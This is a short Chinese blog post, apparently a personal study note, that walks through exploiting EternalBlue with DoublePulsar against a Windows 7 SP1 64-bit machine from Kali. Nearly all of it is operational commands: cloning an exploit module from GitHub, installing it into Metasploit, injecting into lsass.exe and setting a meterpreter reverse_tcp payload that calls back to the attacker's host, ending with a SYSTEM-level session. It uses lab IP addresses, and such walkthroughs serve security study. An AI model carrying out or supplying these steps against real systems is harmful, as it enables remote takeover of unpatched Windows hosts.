起因
最近在学习内网渗透,考虑到永恒家族的重要性,记录一下永恒之蓝的利用过程,一般用在win server 2008和win7上。
我们以win7 64位为例子
目标机器:windows 7 sp1 64位
攻击机器:kali 64位
首先我们安装wine32组件。
dpkg --add-architecture i386
apt-get install wine32
wine cmd.exe
exit
安装完成之后我们把代码git下来
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
,啊哈,原先以为kali没有装,所以就是直接复制进去的,导致了后面ps中发生的错误
我们进入Eternalblue-Doublepulsar-Metasploit目录,并把模块复制到msf对应的目录中
cd Eternalblue-Doublepulsar-Metasploit
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
ps:这边有一个坑,就是我们用cp这个命令的话只是把这个 eternalblue_doublepulsar.rb复制到*/smb/目录下,但是并没有复制deps
目录和其中的文件
我们可以查看一下eternalblue_doublepulsar.rb里面的内容,发现在这边有个目录/root/Eternalblue-Doublepulsar-Metasploit-master/deps/
,是关于deps的
,我们这是从github下载的,原先就是已经下载好了的,就是说你要把deps
这个目录放在/root/Eternalblue-Doublepulsar-Metasploit-master/
下,不然的话会报错。所以这个俩个位置一定要注意看
我们开启msf
msfconsole
use exploit/windows/smb/eternalblue_doublepulsar
我们设置必要的参数和payload,该模块需要配置的参数较多。
set PROCESSINJECT lsass.exe #设置注入进程的名称,64位的操作系统位lsass.exe
set RHOST 192.168.142.128 #设置目标机器的IP
set TARGETARCHITECTURE x64 #设置目标机器的系统架构
set target 8 #设置目标机器的系统类型,可以使用show targets命令查看支持的操作系统
set payload windows/x64/meterpreter/reverse_tcp #设置payload为反向连接的载荷
set LHOST 192.168.142.133 #设置反向连接的IP为本机。
exploit #执行
这是大佬设置参数,给大家参考一下,懒就不想再做实验了
执行exploit命令之后,获取到目标机器的会话,权限为system
所有评论(0)